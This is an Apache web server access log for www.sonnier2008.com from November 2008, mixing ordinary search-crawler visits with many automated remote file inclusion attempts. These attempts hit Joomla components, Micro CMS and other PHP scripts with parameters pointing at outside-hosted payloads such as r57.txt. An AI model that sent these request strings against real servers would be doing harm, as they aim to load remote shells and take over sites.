59.125.183.76 - - [20/Nov/2008:04:07:07 -0800] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.crci.cn/bbs/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sonnier2008.com"
59.125.183.76 - - [20/Nov/2008:04:07:07 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.crci.cn/bbs/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sonnier2008.com"
59.125.183.76 - - [20/Nov/2008:04:07:21 -0800] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.crci.cn/bbs/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sonnier2008.com"
59.125.183.76 - - [20/Nov/2008:04:07:21 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.crci.cn/bbs/idrfi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sonnier2008.com"
69.73.133.74 - - [20/Nov/2008:04:09:07 -0800] "GET /logs/access_081023.log/modules/mod_weather.php?absolute_path=http://www.musendi.com/gaestebuch/2006/02/23/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.sonnier2008.com"
69.73.133.74 - - [20/Nov/2008:04:09:07 -0800] "GET /logs/modules/mod_weather.php?absolute_path=http://www.musendi.com/gaestebuch/2006/02/23/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.sonnier2008.com"
69.73.133.74 - - [20/Nov/2008:04:09:07 -0800] "GET /modules/mod_weather.php?absolute_path=http://www.musendi.com/gaestebuch/2006/02/23/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.sonnier2008.com"
69.73.133.74 - - [20/Nov/2008:04:09:11 -0800] "GET /logs/access_081015.log/modules/mod_weather.php?absolute_path=http://www.musendi.com/gaestebuch/2006/02/23/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.sonnier2008.com"
216.65.20.132 - - [20/Nov/2008:04:14:08 -0800] "GET /logs/access_080902.log//micro_cms_files/microcms-include.php?microcms_path=http://www.bryanfranklin.com/modules/xoopsgallery/cache.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sonnier2008.com"
216.65.20.132 - - [20/Nov/2008:04:14:08 -0800] "GET /micro_cms_files/microcms-include.php?microcms_path=http://www.bryanfranklin.com/modules/xoopsgallery/cache.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sonnier2008.com"
216.65.20.132 - - [20/Nov/2008:04:14:08 -0800] "GET /logs//micro_cms_files/microcms-include.php?microcms_path=http://www.bryanfranklin.com/modules/xoopsgallery/cache.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sonnier2008.com"
216.65.20.132 - - [20/Nov/2008:04:19:06 -0800] "GET /logs/access_080902.log//micro_cms_files/microcms-include.php?microcms_path=http://www.bryanfranklin.com/modules/xoopsgallery/cache.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sonnier2008.com"
216.65.20.132 - - [20/Nov/2008:04:19:06 -0800] "GET /micro_cms_files/microcms-include.php?microcms_path=http://www.bryanfranklin.com/modules/xoopsgallery/cache.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sonnier2008.com"
216.65.20.132 - - [20/Nov/2008:04:19:06 -0800] "GET /logs//micro_cms_files/microcms-include.php?microcms_path=http://www.bryanfranklin.com/modules/xoopsgallery/cache.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sonnier2008.com"
66.147.239.184 - - [20/Nov/2008:04:21:27 -0800] "GET /logs/access_080918.log/?custompluginfile[]=http://www.diplom.nu/templates_c/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sonnier2008.com"
66.147.239.184 - - [20/Nov/2008:04:21:27 -0800] "GET /?custompluginfile[]=http://www.diplom.nu/templates_c/id2.txt?? HTTP/1.1" 200 3006 "-" "libwww-perl/5.810" "www.sonnier2008.com"
66.147.239.184 - - [20/Nov/2008:04:21:28 -0800] "GET /logs/?custompluginfile[]=http://www.diplom.nu/templates_c/id2.txt?? HTTP/1.1" 200 4805 "-" "libwww-perl/5.810" "www.sonnier2008.com"
216.65.20.132 - - [20/Nov/2008:04:21:30 -0800] "GET /logs/access_080919.log//micro_cms_files/microcms-include.php?microcms_path=http://www.bryanfranklin.com/modules/xoopsgallery/cache.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sonnier2008.com"
72.30.81.180 - - [20/Nov/2008:04:23:07 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sonnier2008.com"
72.30.81.180 - - [20/Nov/2008:04:23:38 -0800] "GET /logs/?D=A HTTP/1.0" 200 4789 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sonnier2008.com"
66.147.239.184 - - [20/Nov/2008:04:24:15 -0800] "GET /logs/access_080912.log/?custompluginfile[]=http://www.diplom.nu/templates_c/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.sonnier2008.com"
69.73.133.74 - - [20/Nov/2008:04:25:57 -0800] "GET /micro_cms_files/microcms-include.php?microcms_path=http://www.musendi.com/gaestebuch/2006/02/23/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.sonnier2008.com"
69.73.133.74 - - [20/Nov/2008:04:25:57 -0800] "GET /logs//micro_cms_files/microcms-include.php?microcms_path=http://www.musendi.com/gaestebuch/2006/02/23/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.sonnier2008.com"
69.73.133.74 - - [20/Nov/2008:04:25:57 -0800] "GET /logs/access_080902.log//micro_cms_files/microcms-include.php?microcms_path=http://www.musendi.com/gaestebuch/2006/02/23/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.sonnier2008.com"
69.73.133.74 - - [20/Nov/2008:04:27:19 -0800] "GET /logs/access_080919.log//micro_cms_files/microcms-include.php?microcms_path=http://www.musendi.com/gaestebuch/2006/02/23/idfeelcomz.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.sonnier2008.com"
208.111.154.15 - - [20/Nov/2008:04:37:59 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.sonnier2008.com"
208.111.154.16 - - [20/Nov/2008:04:38:08 -0800] "GET / HTTP/1.1" 200 3006 "-" "Mozilla/5.0 (compatible; Charlotte/1.1; http://www.searchme.com/support/)" "www.sonnier2008.com"
77.221.130.16 - - [20/Nov/2008:04:40:07 -0800] "GET /logs/access_080923.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://allindia-classified.com/images/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sonnier2008.com"
77.221.130.16 - - [20/Nov/2008:04:40:07 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://allindia-classified.com/images/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sonnier2008.com"
77.221.130.16 - - [20/Nov/2008:04:40:08 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://allindia-classified.com/images/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sonnier2008.com"
77.221.130.16 - - [20/Nov/2008:04:40:08 -0800] "GET /logs/access_080917.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://allindia-classified.com/images/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sonnier2008.com"
77.221.130.16 - - [20/Nov/2008:04:42:36 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://allindia-classified.com/images/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sonnier2008.com"
77.221.130.16 - - [20/Nov/2008:04:42:41 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://allindia-classified.com/images/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sonnier2008.com"
77.221.130.16 - - [20/Nov/2008:04:43:30 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://allindia-classified.com/images/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sonnier2008.com"
77.221.130.16 - - [20/Nov/2008:04:44:21 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://allindia-classified.com/images/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sonnier2008.com"
70.85.149.242 - - [20/Nov/2008:04:44:43 -0800] "GET /logs/?custompluginfile[]=www.geocities.com/kucluk_pamungkas/id.txt? HTTP/1.1" 200 4805 "-" "libwww-perl/5.819" "www.sonnier2008.com"
70.85.149.242 - - [20/Nov/2008:04:44:43 -0800] "GET /?custompluginfile[]=www.geocities.com/kucluk_pamungkas/id.txt? HTTP/1.1" 200 3006 "-" "libwww-perl/5.819" "www.sonnier2008.com"
70.85.149.242 - - [20/Nov/2008:04:44:45 -0800] "GET /logs/?custompluginfile[]=http://www.opst.or.kr/board/board_icon/safe.txt??? HTTP/1.1" 200 4805 "-" "libwww-perl/5.819" "www.sonnier2008.com"
70.85.149.242 - - [20/Nov/2008:04:44:45 -0800] "GET /?custompluginfile[]=http://www.opst.or.kr/board/board_icon/safe.txt??? HTTP/1.1" 200 3006 "-" "libwww-perl/5.819" "www.sonnier2008.com"
77.221.130.16 - - [20/Nov/2008:04:47:41 -0800] "GET /logs/access_080923.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://allindia-classified.com/images/r57.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.sonnier2008.com"
77.221.130.16 - - [20/Nov/2008:04:47:41 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://allindia-classified.com/images/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sonnier2008.com"
77.221.130.16 - - [20/Nov/2008:04:47:42 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://allindia-classified.com/images/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sonnier2008.com"
77.221.130.16 - - [20/Nov/2008:04:48:43 -0800] "GET /logs/access_080917.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://allindia-classified.com/images/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sonnier2008.com"
65.18.169.40 - - [20/Nov/2008:04:50:00 -0800] "GET /logs/?custompluginfile[]=http://www.diplom.nu/templates_c/id.txt?? HTTP/1.1" 200 4805 "-" "libwww-perl/5.805" "www.sonnier2008.com"
65.18.169.40 - - [20/Nov/2008:04:50:00 -0800] "GET /?custompluginfile[]=http://www.diplom.nu/templates_c/id.txt?? HTTP/1.1" 200 3006 "-" "libwww-perl/5.805" "www.sonnier2008.com"
89.218.85.18 - - [20/Nov/2008:04:52:42 -0800] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://geocities.com/d.imud/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sonnier2008.com"
89.218.85.18 - - [20/Nov/2008:04:52:42 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://geocities.com/d.imud/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sonnier2008.com"
94.102.60.115 - - [20/Nov/2008:04:53:15 -0800] "GET /logs/access_080825.log HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)" "www.sonnier2008.com"
94.102.60.115 - - [20/Nov/2008:04:53:16 -0800] "GET / HTTP/1.0" 200 2990 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)" "www.sonnier2008.com"
218.239.45.184 - - [20/Nov/2008:04:54:20 -0800] "GET /logs/?custompluginfile[]=http://www.opst.or.kr/board/board_icon/safe.txt??? HTTP/1.1" 200 4805 "-" "libwww-perl/5.79" "www.sonnier2008.com"
200.49.188.178 - - [20/Nov/2008:04:54:21 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.kuiwa.at/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sonnier2008.com"
218.239.45.184 - - [20/Nov/2008:04:54:21 -0800] "GET /?custompluginfile[]=http://www.opst.or.kr/board/board_icon/safe.txt??? HTTP/1.1" 200 3006 "-" "libwww-perl/5.79" "www.sonnier2008.com"
200.49.188.178 - - [20/Nov/2008:04:54:21 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://www.kuiwa.at/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sonnier2008.com"
77.221.130.16 - - [20/Nov/2008:04:54:29 -0800] "GET /logs/access_080923.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://allindia-classified.com/images/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sonnier2008.com"
77.221.130.16 - - [20/Nov/2008:04:54:30 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://allindia-classified.com/images/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sonnier2008.com"
77.221.130.16 - - [20/Nov/2008:04:54:30 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://allindia-classified.com/images/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sonnier2008.com"
206.225.91.21 - - [20/Nov/2008:04:54:46 -0800] "GET /logs/administrator/components/com_treeg/admin.rssreader.php?mosConfig_live_site=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sonnier2008.com"
206.225.91.21 - - [20/Nov/2008:04:54:46 -0800] "GET /administrator/components/com_treeg/admin.rssreader.php?mosConfig_live_site=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sonnier2008.com"
206.225.91.21 - - [20/Nov/2008:04:54:46 -0800] "GET /logs/access.log/administrator/components/com_treeg/admin.rssreader.php?mosConfig_live_site=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sonnier2008.com"
206.225.91.21 - - [20/Nov/2008:04:54:46 -0800] "GET /logs/access_081105.log/administrator/components/com_treeg/admin.rssreader.php?mosConfig_live_site=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sonnier2008.com"
77.221.130.16 - - [20/Nov/2008:04:55:24 -0800] "GET /logs/access_080917.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://allindia-classified.com/images/r57.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sonnier2008.com"
213.147.116.24 - - [20/Nov/2008:04:56:12 -0800] "GET /logs/access.log/administrator/components/com_treeg/admin.rssreader.php?mosConfig_live_site=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sonnier2008.com"
213.147.116.24 - - [20/Nov/2008:04:56:12 -0800] "GET /logs/administrator/components/com_treeg/admin.rssreader.php?mosConfig_live_site=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sonnier2008.com"
213.147.116.24 - - [20/Nov/2008:04:56:12 -0800] "GET /administrator/components/com_treeg/admin.rssreader.php?mosConfig_live_site=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sonnier2008.com"
213.147.116.24 - - [20/Nov/2008:04:56:20 -0800] "GET /logs/access_081105.log/administrator/components/com_treeg/admin.rssreader.php?mosConfig_live_site=http://www.newminiclub.nl/logo.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.sonnier2008.com"
87.106.245.44 - - [20/Nov/2008:04:57:26 -0800] "GET /config/dbutil.bck.php?confdir=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sonnier2008.com"
87.106.245.44 - - [20/Nov/2008:04:57:26 -0800] "GET /logs//config/dbutil.bck.php?confdir=http://emodrago.t35.com/sorgente.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sonnier2008.com"
70.85.149.242 - - [20/Nov/2008:04:58:54 -0800] "GET /logs/access_080918.log/?custompluginfile[]=http://www.opst.or.kr/board/board_icon/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.sonnier2008.com"
70.85.149.242 - - [20/Nov/2008:04:58:55 -0800] "GET /?custompluginfile[]=http://www.opst.or.kr/board/board_icon/safe.txt??? HTTP/1.1" 200 3006 "-" "libwww-perl/5.819" "www.sonnier2008.com"
70.85.149.242 - - [20/Nov/2008:04:58:55 -0800] "GET /logs/?custompluginfile[]=http://www.opst.or.kr/board/board_icon/safe.txt??? HTTP/1.1" 200 4805 "-" "libwww-perl/5.819" "www.sonnier2008.com"
89.218.85.18 - - [20/Nov/2008:04:58:59 -0800] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://geocities.com/d.imud/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sonnier2008.com"
70.85.149.242 - - [20/Nov/2008:05:00:30 -0800] "GET /logs/access_080918.log/?custompluginfile[]=www.geocities.com/kucluk_pamungkas/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.sonnier2008.com"
70.85.149.242 - - [20/Nov/2008:05:00:30 -0800] "GET /?custompluginfile[]=www.geocities.com/kucluk_pamungkas/id.txt? HTTP/1.1" 200 3006 "-" "libwww-perl/5.819" "www.sonnier2008.com"
70.85.149.242 - - [20/Nov/2008:05:00:30 -0800] "GET /logs/?custompluginfile[]=www.geocities.com/kucluk_pamungkas/id.txt? HTTP/1.1" 200 4805 "-" "libwww-perl/5.819" "www.sonnier2008.com"
70.85.149.242 - - [20/Nov/2008:05:00:50 -0800] "GET /logs/access_080912.log/?custompluginfile[]=http://www.opst.or.kr/board/board_icon/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.sonnier2008.com"
70.85.149.242 - - [20/Nov/2008:05:02:14 -0800] "GET /logs/access_080912.log/?custompluginfile[]=www.geocities.com/kucluk_pamungkas/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.sonnier2008.com"
81.21.74.141 - - [20/Nov/2008:05:03:21 -0800] "GET /logs//includes/db_connect.php?baseDir=http://wisemaker.co.kr/bbs/r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sonnier2008.com"
81.21.74.141 - - [20/Nov/2008:05:03:22 -0800] "GET /includes/db_connect.php?baseDir=http://wisemaker.co.kr/bbs/r0x.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sonnier2008.com"
64.254.233.2 - - [20/Nov/2008:05:15:20 -0800] "GET /logs/errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.sonnier2008.com"
64.254.233.2 - - [20/Nov/2008:05:15:20 -0800] "GET /errors.php?error=http://emrtk.uni-miskolc.hu/forum_hun/language/lang_hungarian_formal/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.sonnier2008.com"
74.52.107.130 - - [20/Nov/2008:05:16:31 -0800] "GET /logs//data/inc/lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.michael-cromer.com/templates/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.sonnier2008.com"
74.52.107.130 - - [20/Nov/2008:05:16:31 -0800] "GET /data/inc/lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.michael-cromer.com/templates/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.sonnier2008.com"
74.52.107.130 - - [20/Nov/2008:05:16:39 -0800] "GET /logs//data/inc/lib/pcltar.lib.php?g_pcltar_lib_dir=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.sonnier2008.com"
74.52.107.130 - - [20/Nov/2008:05:16:39 -0800] "GET /data/inc/lib/pcltar.lib.php?g_pcltar_lib_dir=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.sonnier2008.com"
72.30.142.252 - - [20/Nov/2008:05:18:02 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sonnier2008.com"
72.30.142.252 - - [20/Nov/2008:05:18:41 -0800] "GET /logs/access_080502.log HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sonnier2008.com"
200.49.188.178 - - [20/Nov/2008:05:19:10 -0800] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.kuiwa.at/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sonnier2008.com"
200.49.188.178 - - [20/Nov/2008:05:19:10 -0800] "GET /administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.kuiwa.at/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sonnier2008.com"
70.85.149.242 - - [20/Nov/2008:05:20:47 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=www.geocities.com/kucluk_pamungkas/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.sonnier2008.com"
70.85.149.242 - - [20/Nov/2008:05:20:47 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=www.geocities.com/kucluk_pamungkas/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.sonnier2008.com"
70.85.149.242 - - [20/Nov/2008:05:21:32 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.opst.or.kr/board/board_icon/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.sonnier2008.com"
70.85.149.242 - - [20/Nov/2008:05:21:33 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.opst.or.kr/board/board_icon/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.819" "www.sonnier2008.com"
218.239.45.184 - - [20/Nov/2008:05:27:33 -0800] "GET /logs/access_080918.log/?custompluginfile[]=http://www.opst.or.kr/board/board_icon/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sonnier2008.com"
218.239.45.184 - - [20/Nov/2008:05:27:34 -0800] "GET /?custompluginfile[]=http://www.opst.or.kr/board/board_icon/safe.txt??? HTTP/1.1" 200 3006 "-" "libwww-perl/5.79" "www.sonnier2008.com"
218.239.45.184 - - [20/Nov/2008:05:27:36 -0800] "GET /logs/?custompluginfile[]=http://www.opst.or.kr/board/board_icon/safe.txt??? HTTP/1.1" 200 4805 "-" "libwww-perl/5.79" "www.sonnier2008.com"
38.103.63.58 - - [20/Nov/2008:05:29:01 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.sonnier2008.com"
216.65.20.132 - - [20/Nov/2008:05:29:31 -0800] "GET /micro_cms_files/microcms-include.php?microcms_path=http://www.bryanfranklin.com/modules/xoopsgallery/cache.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sonnier2008.com"
65.18.169.40 - - [20/Nov/2008:05:31:02 -0800] "GET /logs/access_080918.log/?custompluginfile[]=http://www.diplom.nu/templates_c/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sonnier2008.com"
72.30.142.252 - - [20/Nov/2008:05:31:53 -0800] "GET /logs/access_081119.log HTTP/1.0" 200 338928 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.sonnier2008.com"
218.239.45.184 - - [20/Nov/2008:05:32:50 -0800] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.opst.or.kr/board/board_icon/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sonnier2008.com"
218.239.45.184 - - [20/Nov/2008:05:32:51 -0800] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.opst.or.kr/board/board_icon/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sonnier2008.com"
65.18.169.40 - - [20/Nov/2008:05:32:57 -0800] "GET /logs/access_080912.log/?custompluginfile[]=http://www.diplom.nu/templates_c/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.sonnier2008.com"
38.103.63.58 - - [20/Nov/2008:05:34:49 -0800] "GET /logs/access_080704.log HTTP/1.1" 404 275 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.sonnier2008.com"
218.239.45.184 - - [20/Nov/2008:05:38:13 -0800] "GET /logs/access_080912.log/?custompluginfile[]=http://www.opst.or.kr/board/board_icon/safe.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.sonnier2008.com"
38.103.63.58 - - [20/Nov/2008:05:39:24 -0800] "GET /logs/access_080622.log HTTP/1.1" 404 275 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.sonnier2008.com"
38.103.63.58 - - [20/Nov/2008:05:42:48 -0800] "GET /tmp/_private/ HTTP/1.1" 403 163 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.sonnier2008.com"
216.65.20.132 - - [20/Nov/2008:05:45:28 -0800] "GET /logs/access_080902.log//micro_cms_files/microcms-include.php?microcms_path=http://www.bryanfranklin.com/modules/xoopsgallery/cache.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sonnier2008.com"
216.65.20.132 - - [20/Nov/2008:05:45:28 -0800] "GET /micro_cms_files/microcms-include.php?microcms_path=http://www.bryanfranklin.com/modules/xoopsgallery/cache.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sonnier2008.com"
216.65.20.132 - - [20/Nov/2008:05:45:28 -0800] "GET /logs//micro_cms_files/microcms-include.php?microcms_path=http://www.bryanfranklin.com/modules/xoopsgallery/cache.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sonnier2008.com"
38.103.63.58 - - [20/Nov/2008:05:46:58 -0800] "GET /contact_us_volunteer HTTP/1.1" 200 25163 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.sonnier2008.com"
216.65.20.132 - - [20/Nov/2008:05:50:08 -0800] "GET /logs/access_080919.log//micro_cms_files/microcms-include.php?microcms_path=http://www.bryanfranklin.com/modules/xoopsgallery/cache.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.sonnier2008.com"
38.103.63.58 - - [20/Nov/2008:05:50:41 -0800] "GET /logs/access_080711.log HTTP/1.1" 404 275 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.sonnier2008.com"
38.103.63.58 - - [20/Nov/2008:05:54:07 -0800] "GET /clipart/backgrounds/ HTTP/1.1" 200 693 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.sonnier2008.com"
38.103.63.58 - - [20/Nov/2008:05:56:50 -0800] "GET /logs/access_080625.log HTTP/1.1" 404 275 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.sonnier2008.com"
38.103.63.58 - - [20/Nov/2008:06:00:18 -0800] "GET /logs/access_080716.log HTTP/1.1" 404 275 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.sonnier2008.com"
38.103.63.58 - - [20/Nov/2008:06:03:07 -0800] "GET /logs/access_080630.log HTTP/1.1" 404 275 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.sonnier2008.com"